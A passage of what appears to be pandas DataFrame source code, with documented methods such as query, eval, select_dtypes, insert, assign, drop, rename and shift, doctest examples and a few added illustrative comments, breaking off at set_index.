def _box_col_values(self, values, loc: int) -> Series:
"""
Provide boxed values for a column.
"""
# Lookup in columns so that if e.g. a str datetime was passed
# we attach the Timestamp object as the name.
name = self.columns[loc]
klass = self._constructor_sliced
return klass(values, index=self.index, name=name, fastpath=True)
# ----------------------------------------------------------------------
# Unsorted
def query(self, expr, inplace=False, **kwargs):
"""
Query the columns of a DataFrame with a boolean expression.
Parameters
----------
expr : str
The query string to evaluate.
You can refer to variables
in the environment by prefixing them with an '@' character like
``@a + b``.
You can refer to column names that are not valid Python variable names
by surrounding them in backticks. Thus, column names containing spaces
or punctuation (besides underscores) or starting with digits must be
surrounded by backticks. (For example, a column named "Area (cm^2)" would
be referenced as `Area (cm^2)`). Column names which are Python keywords
(like "list", "for", "import", etc.) cannot be used.
For example, if one of your columns is called ``a a`` and you want
to sum it with ``b``, your query should be ```a a` + b``.
.. versionadded:: 0.25.0
Backtick quoting introduced.
.. versionadded:: 1.0.0
Expanding functionality of backtick quoting for more than only spaces.
inplace : bool
Whether the query should modify the data in place or return
a modified copy.
**kwargs
See the documentation for :func:`eval` for complete details
on the keyword arguments accepted by :meth:`DataFrame.query`.
Returns
-------
DataFrame or None
DataFrame resulting from the provided query expression or
None if ``inplace=True``.
See Also
--------
eval : Evaluate a string describing operations on
DataFrame columns.
DataFrame.eval : Evaluate a string describing operations on
DataFrame columns.
Notes
-----
The result of the evaluation of this expression is first passed to
:attr:`DataFrame.loc` and if that fails because of a
multidimensional key (e.g., a DataFrame) then the result will be passed
to :meth:`DataFrame.__getitem__`.
This method uses the top-level :func:`eval` function to
evaluate the passed query.
The :meth:`~pandas.DataFrame.query` method uses a slightly
modified Python syntax by default. For example, the ``&`` and ``|``
(bitwise) operators have the precedence of their boolean cousins,
:keyword:`and` and :keyword:`or`. This *is* syntactically valid Python,
however the semantics are different.
You can change the semantics of the expression by passing the keyword
argument ``parser='python'``. This enforces the same semantics as
evaluation in Python space. Likewise, you can pass ``engine='python'``
to evaluate an expression using Python itself as a backend. This is not
recommended as it is inefficient compared to using ``numexpr`` as the
engine.
The :attr:`DataFrame.index` and
:attr:`DataFrame.columns` attributes of the
:class:`~pandas.DataFrame` instance are placed in the query namespace
by default, which allows you to treat both the index and columns of the
frame as a column in the frame.
The identifier ``index`` is used for the frame index; you can also
use the name of the index to identify it in a query. Please note that
Python keywords may not be used as identifiers.
For further details and examples see the ``query`` documentation in
:ref:`indexing <indexing.query>`.
*Backtick quoted variables*
Backtick quoted variables are parsed as literal Python code and
are converted internally to a valid Python identifier.
This can lead to the following problems.
During parsing a number of disallowed characters inside the backtick
quoted string are replaced by strings that are allowed as a Python identifier.
These characters include all operators in Python, the space character, the
question mark, the exclamation mark, the dollar sign, and the euro sign.
For other characters that fall outside the ASCII range (U+0001..U+007F)
and those that are not further specified in PEP 3131,
the query parser will raise an error.
This excludes whitespace other than the space character, as well as
the hash character (as it is used for comments) and the backtick
itself (the backtick also cannot be escaped).
In a special case, quotes that make a pair around a backtick can
confuse the parser.
For example, ```it's` > `that's``` will raise an error,
as it forms a quoted string (``'s > `that'``) with a backtick inside.
See also the Python documentation about lexical analysis
(https://docs.python.org/3/reference/lexical_analysis.html)
in combination with the source code in :mod:`pandas.core.computation.parsing`.
Examples
--------
>>> df = pd.DataFrame({'A': range(1, 6),
... 'B': range(10, 0, -2),
... 'C C': range(10, 5, -1)})
>>> df
A B C C
0 1 10 10
1 2 8 9
2 3 6 8
3 4 4 7
4 5 2 6
>>> df.query('A > B')
A B C C
4 5 2 6
The previous expression is equivalent to
>>> df[df.A > df.B]
A B C C
4 5 2 6
For columns with spaces in their name, you can use backtick quoting.
>>> df.query('B == `C C`')
A B C C
0 1 10 10
The previous expression is equivalent to
>>> df[df.B == df['C C']]
A B C C
0 1 10 10
"""
inplace = validate_bool_kwarg(inplace, "inplace")
if not isinstance(expr, str):
msg = f"expr must be a string to be evaluated, {type(expr)} given"
raise ValueError(msg)
kwargs["level"] = kwargs.pop("level", 0) + 1
kwargs["target"] = None
res = self.eval(expr, **kwargs)
try:
result = self.loc[res]
except ValueError:
# when res is multi-dimensional loc raises, but this is sometimes a
# valid query
result = self[res]
if inplace:
self._update_inplace(result)
else:
return result
def eval(self, expr, inplace=False, **kwargs):
"""
Evaluate a string describing operations on DataFrame columns.
Operates on columns only, not specific rows or elements. This allows
`eval` to run arbitrary code, which can make you vulnerable to code
injection if you pass user input to this function.
Parameters
----------
expr : str
The expression string to evaluate.
inplace : bool, default False
If the expression contains an assignment, whether to perform the
operation inplace and mutate the existing DataFrame. Otherwise,
a new DataFrame is returned.
**kwargs
See the documentation for :func:`eval` for complete details
on the keyword arguments accepted by
:meth:`~pandas.DataFrame.query`.
Returns
-------
ndarray, scalar, pandas object, or None
The result of the evaluation or None if ``inplace=True``.
See Also
--------
DataFrame.query : Evaluates a boolean expression to query the columns
of a frame.
DataFrame.assign : Can evaluate an expression or function to create new
values for a column.
eval : Evaluate a Python expression as a string using various
backends.
Notes
-----
For more details see the API documentation for :func:`~eval`.
For detailed examples see :ref:`enhancing performance with eval
<enhancingperf.eval>`.
Examples
--------
>>> df = pd.DataFrame({'A': range(1, 6), 'B': range(10, 0, -2)})
>>> df
A B
0 1 10
1 2 8
2 3 6
3 4 4
4 5 2
>>> df.eval('A + B')
0 11
1 10
2 9
3 8
4 7
dtype: int64
Assignment is allowed though by default the original DataFrame is not
modified.
>>> df.eval('C = A + B')
A B C
0 1 10 11
1 2 8 10
2 3 6 9
3 4 4 8
4 5 2 7
>>> df
A B
0 1 10
1 2 8
2 3 6
3 4 4
4 5 2
Use ``inplace=True`` to modify the original DataFrame.
>>> df.eval('C = A + B', inplace=True)
>>> df
A B C
0 1 10 11
1 2 8 10
2 3 6 9
3 4 4 8
4 5 2 7
Multiple columns can be assigned to using multi-line expressions:
>>> df.eval(
... '''
... C = A + B
... D = A - B
... '''
... )
A B C D
0 1 10 11 -9
1 2 8 10 -6
2 3 6 9 -3
3 4 4 8 0
4 5 2 7 3
"""
from pandas.core.computation.eval import eval as _eval
inplace = validate_bool_kwarg(inplace, "inplace")
resolvers = kwargs.pop("resolvers", None)
kwargs["level"] = kwargs.pop("level", 0) + 1
if resolvers is None:
index_resolvers = self._get_index_resolvers()
column_resolvers = self._get_cleaned_column_resolvers()
resolvers = column_resolvers, index_resolvers
if "target" not in kwargs:
kwargs["target"] = self
kwargs["resolvers"] = kwargs.get("resolvers", ()) + tuple(resolvers)
return _eval(expr, inplace=inplace, **kwargs)
def select_dtypes(self, include=None, exclude=None) -> DataFrame:
"""
Return a subset of the DataFrame's columns based on the column dtypes.
Parameters
----------
include, exclude : scalar or list-like
A selection of dtypes or strings to be included/excluded. At least
one of these parameters must be supplied.
Returns
-------
DataFrame
The subset of the frame including the dtypes in ``include`` and
excluding the dtypes in ``exclude``.
Raises
------
ValueError
* If both of ``include`` and ``exclude`` are empty
* If ``include`` and ``exclude`` have overlapping elements
* If any kind of string dtype is passed in.
See Also
--------
DataFrame.dtypes: Return Series with the data type of each column.
Notes
-----
* To select all *numeric* types, use ``np.number`` or ``'number'``
* To select strings you must use the ``object`` dtype, but note that
this will return *all* object dtype columns
* See the `numpy dtype hierarchy
<https://numpy.org/doc/stable/reference/arrays.scalars.html>`__
* To select datetimes, use ``np.datetime64``, ``'datetime'`` or
``'datetime64'``
* To select timedeltas, use ``np.timedelta64``, ``'timedelta'`` or
``'timedelta64'``
* To select Pandas categorical dtypes, use ``'category'``
* To select Pandas datetimetz dtypes, use ``'datetimetz'`` (new in
0.20.0) or ``'datetime64[ns, tz]'``
Examples
--------
>>> df = pd.DataFrame({'a': [1, 2] * 3,
... 'b': [True, False] * 3,
... 'c': [1.0, 2.0] * 3})
>>> df
a b c
0 1 True 1.0
1 2 False 2.0
2 1 True 1.0
3 2 False 2.0
4 1 True 1.0
5 2 False 2.0
>>> df.select_dtypes(include='bool')
b
0 True
1 False
2 True
3 False
4 True
5 False
>>> df.select_dtypes(include=['float64'])
c
0 1.0
1 2.0
2 1.0
3 2.0
4 1.0
5 2.0
>>> df.select_dtypes(exclude=['int64'])
b c
0 True 1.0
1 False 2.0
2 True 1.0
3 False 2.0
4 True 1.0
5 False 2.0
"""
if not is_list_like(include):
include = (include,) if include is not None else ()
if not is_list_like(exclude):
exclude = (exclude,) if exclude is not None else ()
selection = (frozenset(include), frozenset(exclude))
if not any(selection):
raise ValueError("at least one of include or exclude must be nonempty")
# convert the myriad valid dtypes object to a single representation
include = frozenset(infer_dtype_from_object(x) for x in include)
exclude = frozenset(infer_dtype_from_object(x) for x in exclude)
for dtypes in (include, exclude):
invalidate_string_dtypes(dtypes)
# can't both include AND exclude!
if not include.isdisjoint(exclude):
raise ValueError(f"include and exclude overlap on {(include & exclude)}")
# We raise when both include and exclude are empty
# Hence, we can just shrink the columns we want to keep
keep_these = np.full(self.shape[1], True)
def extract_unique_dtypes_from_dtypes_set(
dtypes_set: FrozenSet[Dtype], unique_dtypes: np.ndarray
) -> List[Dtype]:
extracted_dtypes = [
unique_dtype
for unique_dtype in unique_dtypes
# error: Argument 1 to "tuple" has incompatible type
# "FrozenSet[Union[ExtensionDtype, str, Any, Type[str],
# Type[float], Type[int], Type[complex], Type[bool]]]";
# expected "Iterable[Union[type, Tuple[Any, ...]]]"
if issubclass(
unique_dtype.type, tuple(dtypes_set) # type: ignore[arg-type]
)
]
return extracted_dtypes
unique_dtypes = self.dtypes.unique()
if include:
included_dtypes = extract_unique_dtypes_from_dtypes_set(
include, unique_dtypes
)
keep_these &= self.dtypes.isin(included_dtypes)
if exclude:
excluded_dtypes = extract_unique_dtypes_from_dtypes_set(
exclude, unique_dtypes
)
keep_these &= ~self.dtypes.isin(excluded_dtypes)
return self.iloc[:, keep_these.values]
def insert(self, loc, column, value, allow_duplicates=False) -> None:
"""
Insert column into DataFrame at specified location.
Raises a ValueError if `column` is already contained in the DataFrame,
unless `allow_duplicates` is set to True.
Parameters
----------
loc : int
Insertion index. Must verify 0 <= loc <= len(columns).
column : str, number, or hashable object
Label of the inserted column.
value : int, Series, or array-like
allow_duplicates : bool, optional
"""
if allow_duplicates and not self.flags.allows_duplicate_labels:
raise ValueError(
"Cannot specify 'allow_duplicates=True' when "
"'self.flags.allows_duplicate_labels' is False."
)
self._ensure_valid_index(value)
value = self._sanitize_column(column, value, broadcast=False)
self._mgr.insert(loc, column, value, allow_duplicates=allow_duplicates)
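# Hedged usage sketch for ``insert`` (illustrative only; the frame below is a
# hypothetical example, not part of the pandas source). ``loc`` is positional,
# so the new column lands between the existing ones, and the operation is
# in place:
#
#   >>> df = pd.DataFrame({"a": [1, 2], "c": [5, 6]})
#   >>> df.insert(1, "b", [3, 4])
#   >>> list(df.columns)
#   ['a', 'b', 'c']
#
# Re-inserting an existing label raises ValueError unless
# ``allow_duplicates=True`` is passed.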
def assign(self, **kwargs) -> DataFrame:
r"""
Assign new columns to a DataFrame.
Returns a new object with all original columns in addition to new ones.
Existing columns that are re-assigned will be overwritten.
Parameters
----------
**kwargs : dict of {str: callable or Series}
The column names are keywords. If the values are
callable, they are computed on the DataFrame and
assigned to the new columns. The callable must not
change the input DataFrame (though pandas doesn't check it).
If the values are not callable, (e.g. a Series, scalar, or array),
they are simply assigned.
Returns
-------
DataFrame
A new DataFrame with the new columns in addition to
all the existing columns.
Notes
-----
Assigning multiple columns within the same ``assign`` is possible.
Later items in '\*\*kwargs' may refer to newly created or modified
columns in 'df'; items are computed and assigned into 'df' in order.
Examples
--------
>>> df = pd.DataFrame({'temp_c': [17.0, 25.0]},
... index=['Portland', 'Berkeley'])
>>> df
temp_c
Portland 17.0
Berkeley 25.0
Where the value is a callable, evaluated on `df`:
>>> df.assign(temp_f=lambda x: x.temp_c * 9 / 5 + 32)
temp_c temp_f
Portland 17.0 62.6
Berkeley 25.0 77.0
Alternatively, the same behavior can be achieved by directly
referencing an existing Series or sequence:
>>> df.assign(temp_f=df['temp_c'] * 9 / 5 + 32)
temp_c temp_f
Portland 17.0 62.6
Berkeley 25.0 77.0
You can create multiple columns within the same assign where one
of the columns depends on another one defined within the same assign:
>>> df.assign(temp_f=lambda x: x['temp_c'] * 9 / 5 + 32,
... temp_k=lambda x: (x['temp_f'] + 459.67) * 5 / 9)
temp_c temp_f temp_k
Portland 17.0 62.6 290.15
Berkeley 25.0 77.0 298.15
"""
data = self.copy()
for k, v in kwargs.items():
data[k] = com.apply_if_callable(v, data)
return data
def _sanitize_column(self, key, value, broadcast=True):
"""
Ensures new columns (which go into the BlockManager as new blocks) are
always copied and converted into an array.
Parameters
----------
key : object
value : scalar, Series, or array-like
broadcast : bool, default True
If ``key`` matches multiple duplicate column names in the
DataFrame, this parameter indicates whether ``value`` should be
tiled so that the returned array contains a (duplicated) column for
each occurrence of the key. If False, ``value`` will not be tiled.
Returns
-------
numpy.ndarray
"""
def reindexer(value):
# reindex if necessary
if value.index.equals(self.index) or not len(self.index):
value = value._values.copy()
else:
# GH 4107
try:
value = value.reindex(self.index)._values
except ValueError as err:
# raised in MultiIndex.from_tuples, see test_insert_error_msmgs
if not value.index.is_unique:
# duplicate axis
raise err
# other
raise TypeError(
"incompatible index of inserted column with frame index"
) from err
return value
if isinstance(value, Series):
value = reindexer(value)
elif isinstance(value, DataFrame):
# align right-hand-side columns if self.columns
# is multi-index and self[key] is a sub-frame
if isinstance(self.columns, MultiIndex) and key in self.columns:
loc = self.columns.get_loc(key)
if isinstance(loc, (slice, Series, np.ndarray, Index)):
cols = maybe_droplevels(self.columns[loc], key)
if len(cols) and not cols.equals(value.columns):
value = value.reindex(cols, axis=1)
# now align rows
value = reindexer(value).T
elif isinstance(value, ExtensionArray):
# Explicitly copy here, instead of in sanitize_index,
# as sanitize_index won't copy an EA, even with copy=True
value = value.copy()
value = sanitize_index(value, self.index)
elif isinstance(value, Index) or is_sequence(value):
# turn me into an ndarray
value = sanitize_index(value, self.index)
if not isinstance(value, (np.ndarray, Index)):
if isinstance(value, list) and len(value) > 0:
value = maybe_convert_platform(value)
else:
value = com.asarray_tuplesafe(value)
elif value.ndim == 2:
value = value.copy().T
elif isinstance(value, Index):
value = value.copy(deep=True)
else:
value = value.copy()
# possibly infer to datetimelike
if is_object_dtype(value.dtype):
value = maybe_infer_to_datetimelike(value)
else:
# cast ignores pandas dtypes. so save the dtype first
infer_dtype, _ = infer_dtype_from_scalar(value, pandas_dtype=True)
# upcast
if is_extension_array_dtype(infer_dtype):
value = construct_1d_arraylike_from_scalar(
value, len(self.index), infer_dtype
)
else:
value = cast_scalar_to_array(len(self.index), value)
value = maybe_cast_to_datetime(value, infer_dtype)
# return internal types directly
if is_extension_array_dtype(value):
return value
# broadcast across multiple columns if necessary
if broadcast and key in self.columns and value.ndim == 1:
if not self.columns.is_unique or isinstance(self.columns, MultiIndex):
existing_piece = self[key]
if isinstance(existing_piece, DataFrame):
value = np.tile(value, (len(existing_piece.columns), 1))
return np.atleast_2d(np.asarray(value))
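# Minimal sketch of the ``broadcast`` path above (hypothetical data, not part
# of the pandas source): when ``key`` matches several duplicate column labels,
# a one-dimensional value is tiled so each occurrence receives a column.
#
#   >>> df = pd.DataFrame([[1, 2], [3, 4]], columns=["a", "a"])
#   >>> df["a"] = [10, 20]
#   >>> df.to_numpy().tolist()
#   [[10, 10], [20, 20]]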
@property
def _series(self):
return {
item: Series(
self._mgr.iget(idx), index=self.index, name=item, fastpath=True
)
for idx, item in enumerate(self.columns)
}
def lookup(self, row_labels, col_labels) -> np.ndarray:
"""
Label-based "fancy indexing" function for DataFrame.
Given equal-length arrays of row and column labels, return an
array of the values corresponding to each (row, col) pair.
.. deprecated:: 1.2.0
DataFrame.lookup is deprecated,
use DataFrame.melt and DataFrame.loc instead.
For an example see :meth:`~pandas.DataFrame.lookup`
in the user guide.
Parameters
----------
row_labels : sequence
The row labels to use for lookup.
col_labels : sequence
The column labels to use for lookup.
Returns
-------
numpy.ndarray
The found values.
"""
msg = (
"The 'lookup' method is deprecated and will be"
"removed in a future version."
"You can use DataFrame.melt and DataFrame.loc"
"as a substitute."
)
warnings.warn(msg, FutureWarning, stacklevel=2)
n = len(row_labels)
if n != len(col_labels):
raise ValueError("Row labels must have same size as column labels")
if not (self.index.is_unique and self.columns.is_unique):
# GH#33041
raise ValueError("DataFrame.lookup requires unique index and columns")
thresh = 1000
if not self._is_mixed_type or n > thresh:
values = self.values
ridx = self.index.get_indexer(row_labels)
cidx = self.columns.get_indexer(col_labels)
if (ridx == -1).any():
raise KeyError("One or more row labels was not found")
if (cidx == -1).any():
raise KeyError("One or more column labels was not found")
flat_index = ridx * len(self.columns) + cidx
result = values.flat[flat_index]
else:
result = np.empty(n, dtype="O")
for i, (r, c) in enumerate(zip(row_labels, col_labels)):
result[i] = self._get_value(r, c)
if is_object_dtype(result):
result = lib.maybe_convert_objects(result)
return result
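# Hedged sketch of the substitute suggested by the deprecation warning above
# (hypothetical data, not part of the pandas source): with unique labels the
# same per-(row, col) values can be gathered with vectorised indexing.
#
#   >>> df = pd.DataFrame({"A": [10, 20], "B": [30, 40]}, index=["x", "y"])
#   >>> rows, cols = ["x", "y"], ["B", "A"]
#   >>> df.to_numpy()[df.index.get_indexer(rows), df.columns.get_indexer(cols)]
#   array([30, 20])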
# ----------------------------------------------------------------------
# Reindexing and alignment
def _reindex_axes(self, axes, level, limit, tolerance, method, fill_value, copy):
frame = self
columns = axes["columns"]
if columns is not None:
frame = frame._reindex_columns(
columns, method, copy, level, fill_value, limit, tolerance
)
index = axes["index"]
if index is not None:
frame = frame._reindex_index(
index, method, copy, level, fill_value, limit, tolerance
)
return frame
def _reindex_index(
self,
new_index,
method,
copy,
level,
fill_value=np.nan,
limit=None,
tolerance=None,
):
new_index, indexer = self.index.reindex(
new_index, method=method, level=level, limit=limit, tolerance=tolerance
)
return self._reindex_with_indexers(
{0: [new_index, indexer]},
copy=copy,
fill_value=fill_value,
allow_dups=False,
)
def _reindex_columns(
self,
new_columns,
method,
copy,
level,
fill_value=None,
limit=None,
tolerance=None,
):
new_columns, indexer = self.columns.reindex(
new_columns, method=method, level=level, limit=limit, tolerance=tolerance
)
return self._reindex_with_indexers(
{1: [new_columns, indexer]},
copy=copy,
fill_value=fill_value,
allow_dups=False,
)
def _reindex_multi(self, axes, copy, fill_value) -> DataFrame:
"""
We are guaranteed non-Nones in the axes.
"""
new_index, row_indexer = self.index.reindex(axes["index"])
new_columns, col_indexer = self.columns.reindex(axes["columns"])
if row_indexer is not None and col_indexer is not None:
indexer = row_indexer, col_indexer
new_values = algorithms.take_2d_multi(
self.values, indexer, fill_value=fill_value
)
return self._constructor(new_values, index=new_index, columns=new_columns)
else:
return self._reindex_with_indexers(
{0: [new_index, row_indexer], 1: [new_columns, col_indexer]},
copy=copy,
fill_value=fill_value,
)
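# Illustrative sketch (not part of the pandas source): the reindexing helpers
# above back the public ``reindex`` call when both axes are supplied, e.g.
#
#   >>> df = pd.DataFrame({"a": [1, 2]}, index=["x", "y"])
#   >>> df.reindex(index=["x", "z"], columns=["a", "b"], fill_value=0)
#      a  b
#   x  1  0
#   z  0  0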
@doc(NDFrame.align, **_shared_doc_kwargs)
def align(
self,
other,
join="outer",
axis=None,
level=None,
copy=True,
fill_value=None,
method=None,
limit=None,
fill_axis=0,
broadcast_axis=None,
) -> DataFrame:
return super().align(
other,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
broadcast_axis=broadcast_axis,
)
@Appender(
"""
Examples
--------
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
Change the row labels.
>>> df.set_axis(['a', 'b', 'c'], axis='index')
A B
a 1 4
b 2 5
c 3 6
Change the column labels.
>>> df.set_axis(['I', 'II'], axis='columns')
I II
0 1 4
1 2 5
2 3 6
Now, update the labels inplace.
>>> df.set_axis(['i', 'ii'], axis='columns', inplace=True)
>>> df
i ii
0 1 4
1 2 5
2 3 6
"""
)
@Substitution(
**_shared_doc_kwargs,
extended_summary_sub=" column or",
axis_description_sub=", and 1 identifies the columns",
see_also_sub=" or columns",
)
@Appender(NDFrame.set_axis.__doc__)
def set_axis(self, labels, axis: Axis = 0, inplace: bool = False):
return super().set_axis(labels, axis=axis, inplace=inplace)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.reindex.__doc__)
@rewrite_axis_style_signature(
"labels",
[
("method", None),
("copy", True),
("level", None),
("fill_value", np.nan),
("limit", None),
("tolerance", None),
],
)
def reindex(self, *args, **kwargs) -> DataFrame:
axes = validate_axis_style_args(self, args, kwargs, "labels", "reindex")
kwargs.update(axes)
# Pop these, since the values are in `kwargs` under different names
kwargs.pop("axis", None)
kwargs.pop("labels", None)
return super().reindex(**kwargs)
def drop(
self,
labels=None,
axis=0,
index=None,
columns=None,
level=None,
inplace=False,
errors="raise",
):
"""
Drop specified labels from rows or columns.
Remove rows or columns by specifying label names and corresponding
axis, or by specifying directly index or column names. When using a
multi-index, labels on different levels can be removed by specifying
the level.
Parameters
----------
labels : single label or list-like
Index or column labels to drop.
axis : {0 or 'index', 1 or 'columns'}, default 0
Whether to drop labels from the index (0 or 'index') or
columns (1 or 'columns').
index : single label or list-like
Alternative to specifying axis (``labels, axis=0``
is equivalent to ``index=labels``).
columns : single label or list-like
Alternative to specifying axis (``labels, axis=1``
is equivalent to ``columns=labels``).
level : int or level name, optional
For MultiIndex, level from which the labels will be removed.
inplace : bool, default False
If False, return a copy. Otherwise, do operation
inplace and return None.
errors : {'ignore', 'raise'}, default 'raise'
If 'ignore', suppress error and only existing labels are
dropped.
Returns
-------
DataFrame or None
DataFrame without the removed index or column labels or
None if ``inplace=True``.
Raises
------
KeyError
If any of the labels is not found in the selected axis.
See Also
--------
DataFrame.loc : Label-location based indexer for selection by label.
DataFrame.dropna : Return DataFrame with labels on given axis omitted
where (all or any) data are missing.
DataFrame.drop_duplicates : Return DataFrame with duplicate rows
removed, optionally only considering certain columns.
Series.drop : Return Series with specified index labels removed.
Examples
--------
>>> df = pd.DataFrame(np.arange(12).reshape(3, 4),
... columns=['A', 'B', 'C', 'D'])
>>> df
A B C D
0 0 1 2 3
1 4 5 6 7
2 8 9 10 11
Drop columns
>>> df.drop(['B', 'C'], axis=1)
A D
0 0 3
1 4 7
2 8 11
>>> df.drop(columns=['B', 'C'])
A D
0 0 3
1 4 7
2 8 11
Drop a row by index
>>> df.drop([0, 1])
A B C D
2 8 9 10 11
Drop columns and/or rows of MultiIndex DataFrame
>>> midx = pd.MultiIndex(levels=[['lama', 'cow', 'falcon'],
... ['speed', 'weight', 'length']],
... codes=[[0, 0, 0, 1, 1, 1, 2, 2, 2],
... [0, 1, 2, 0, 1, 2, 0, 1, 2]])
>>> df = pd.DataFrame(index=midx, columns=['big', 'small'],
... data=[[45, 30], [200, 100], [1.5, 1], [30, 20],
... [250, 150], [1.5, 0.8], [320, 250],
... [1, 0.8], [0.3, 0.2]])
>>> df
big small
lama speed 45.0 30.0
weight 200.0 100.0
length 1.5 1.0
cow speed 30.0 20.0
weight 250.0 150.0
length 1.5 0.8
falcon speed 320.0 250.0
weight 1.0 0.8
length 0.3 0.2
>>> df.drop(index='cow', columns='small')
big
lama speed 45.0
weight 200.0
length 1.5
falcon speed 320.0
weight 1.0
length 0.3
>>> df.drop(index='length', level=1)
big small
lama speed 45.0 30.0
weight 200.0 100.0
cow speed 30.0 20.0
weight 250.0 150.0
falcon speed 320.0 250.0
weight 1.0 0.8
"""
return super().drop(
labels=labels,
axis=axis,
index=index,
columns=columns,
level=level,
inplace=inplace,
errors=errors,
)
@rewrite_axis_style_signature(
"mapper",
[("copy", True), ("inplace", False), ("level", None), ("errors", "ignore")],
)
def rename(
self,
mapper: Optional[Renamer] = None,
*,
index: Optional[Renamer] = None,
columns: Optional[Renamer] = None,
axis: Optional[Axis] = None,
copy: bool = True,
inplace: bool = False,
level: Optional[Level] = None,
errors: str = "ignore",
) -> Optional[DataFrame]:
"""
Alter axes labels.
Function / dict values must be unique (1-to-1). Labels not contained in
a dict / Series will be left as-is. Extra labels listed don't throw an
error.
See the :ref:`user guide <basics.rename>` for more.
Parameters
----------
mapper : dict-like or function
Dict-like or function transformations to apply to
that axis' values. Use either ``mapper`` and ``axis`` to
specify the axis to target with ``mapper``, or ``index`` and
``columns``.
index : dict-like or function
Alternative to specifying axis (``mapper, axis=0``
is equivalent to ``index=mapper``).
columns : dict-like or function
Alternative to specifying axis (``mapper, axis=1``
is equivalent to ``columns=mapper``).
axis : {0 or 'index', 1 or 'columns'}, default 0
Axis to target with ``mapper``. Can be either the axis name
('index', 'columns') or number (0, 1). The default is 'index'.
copy : bool, default True
Also copy underlying data.
inplace : bool, default False
Whether to return a new DataFrame. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
errors : {'ignore', 'raise'}, default 'ignore'
If 'raise', raise a `KeyError` when a dict-like `mapper`, `index`,
or `columns` contains labels that are not present in the Index
being transformed.
If 'ignore', existing keys will be renamed and extra keys will be
ignored.
Returns
-------
DataFrame or None
DataFrame with the renamed axis labels or None if ``inplace=True``.
Raises
------
KeyError
If any of the labels is not found in the selected axis and
"errors='raise'".
See Also
--------
DataFrame.rename_axis : Set the name of the axis.
Examples
--------
``DataFrame.rename`` supports two calling conventions
* ``(index=index_mapper, columns=columns_mapper, ...)``
* ``(mapper, axis={'index', 'columns'}, ...)``
We *highly* recommend using keyword arguments to clarify your
intent.
Rename columns using a mapping:
>>> df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
>>> df.rename(columns={"A": "a", "B": "c"})
a c
0 1 4
1 2 5
2 3 6
Rename index using a mapping:
>>> df.rename(index={0: "x", 1: "y", 2: "z"})
A B
x 1 4
y 2 5
z 3 6
Cast index labels to a different type:
>>> df.index
RangeIndex(start=0, stop=3, step=1)
>>> df.rename(index=str).index
Index(['0', '1', '2'], dtype='object')
>>> df.rename(columns={"A": "a", "B": "b", "C": "c"}, errors="raise")
Traceback (most recent call last):
KeyError: ['C'] not found in axis
Using axis-style parameters:
>>> df.rename(str.lower, axis='columns')
a b
0 1 4
1 2 5
2 3 6
>>> df.rename({1: 2, 2: 4}, axis='index')
A B
0 1 4
2 2 5
4 3 6
"""
return super().rename(
mapper=mapper,
index=index,
columns=columns,
axis=axis,
copy=copy,
inplace=inplace,
level=level,
errors=errors,
)
@doc(NDFrame.fillna, **_shared_doc_kwargs)
def fillna(
self,
value=None,
method=None,
axis=None,
inplace=False,
limit=None,
downcast=None,
) -> Optional[DataFrame]:
return super().fillna(
value=value,
method=method,
axis=axis,
inplace=inplace,
limit=limit,
downcast=downcast,
)
def pop(self, item: Label) -> Series:
"""
Return item and drop from frame. Raise KeyError if not found.
Parameters
----------
item : label
Label of column to be popped.
Returns
-------
Series
Examples
--------
>>> df = pd.DataFrame([('falcon', 'bird', 389.0),
... ('parrot', 'bird', 24.0),
... ('lion', 'mammal', 80.5),
... ('monkey', 'mammal', np.nan)],
... columns=('name', 'class', 'max_speed'))
>>> df
name class max_speed
0 falcon bird 389.0
1 parrot bird 24.0
2 lion mammal 80.5
3 monkey mammal NaN
>>> df.pop('class')
0 bird
1 bird
2 mammal
3 mammal
Name: class, dtype: object
>>> df
name max_speed
0 falcon 389.0
1 parrot 24.0
2 lion 80.5
3 monkey NaN
"""
return super().pop(item=item)
@doc(NDFrame.replace, **_shared_doc_kwargs)
def replace(
self,
to_replace=None,
value=None,
inplace=False,
limit=None,
regex=False,
method="pad",
):
return super().replace(
to_replace=to_replace,
value=value,
inplace=inplace,
limit=limit,
regex=regex,
method=method,
)
def _replace_columnwise(
self, mapping: Dict[Label, Tuple[Any, Any]], inplace: bool, regex
):
"""
Dispatch to Series.replace column-wise.
Parameters
----------
mapping : dict
of the form {col: (target, value)}
inplace : bool
regex : bool or same types as `to_replace` in DataFrame.replace
Returns
-------
DataFrame or None
"""
# Operate column-wise
res = self if inplace else self.copy()
ax = self.columns
for i in range(len(ax)):
if ax[i] in mapping:
ser = self.iloc[:, i]
target, value = mapping[ax[i]]
newobj = ser.replace(target, value, regex=regex)
res.iloc[:, i] = newobj
if inplace:
return
return res.__finalize__(self)
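# Minimal illustration of the ``mapping`` shape consumed above (hypothetical
# values, not part of the pandas source): ``{col: (target, value)}`` means
# "in column ``col``, replace ``target`` with ``value``", e.g.
#
#   mapping = {"status": ("n/a", None), "code": (0, -1)}
#
# which corresponds to calling ``Series.replace(target, value)`` on each of
# the listed columns.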
@doc(NDFrame.shift, klass=_shared_doc_kwargs["klass"])
def shift(
self, periods=1, freq=None, axis=0, fill_value=lib.no_default
) -> DataFrame:
axis = self._get_axis_number(axis)
ncols = len(self.columns)
if axis == 1 and periods != 0 and fill_value is lib.no_default and ncols > 0:
# We will infer fill_value to match the closest column
if periods > 0:
result = self.iloc[:, :-periods]
for col in range(min(ncols, abs(periods))):
# TODO(EA2D): doing this in a loop unnecessary with 2D EAs
# Define filler inside loop so we get a copy
filler = self.iloc[:, 0].shift(len(self))
result.insert(0, col, filler, allow_duplicates=True)
else:
result = self.iloc[:, -periods:]
for col in range(min(ncols, abs(periods))):
# Define filler inside loop so we get a copy
filler = self.iloc[:, -1].shift(len(self))
result.insert(
len(result.columns), col, filler, allow_duplicates=True
)
result.columns = self.columns.copy()
return result
return super().shift(
periods=periods, freq=freq, axis=axis, fill_value=fill_value
)
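# Hedged sketch of the ``axis=1`` branch above (hypothetical frame, not part
# of the pandas source): shifting along columns moves the values of column
# "a" into column "b" and leaves "a" filled with the inferred fill value.
#
#   >>> df = pd.DataFrame({"a": [1, 2], "b": [3, 4]})
#   >>> df.shift(periods=1, axis=1)["b"].tolist()
#   [1, 2]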
def set_index(
self, keys, drop=True, append=False, inplace=False, verify_integrity=False
):
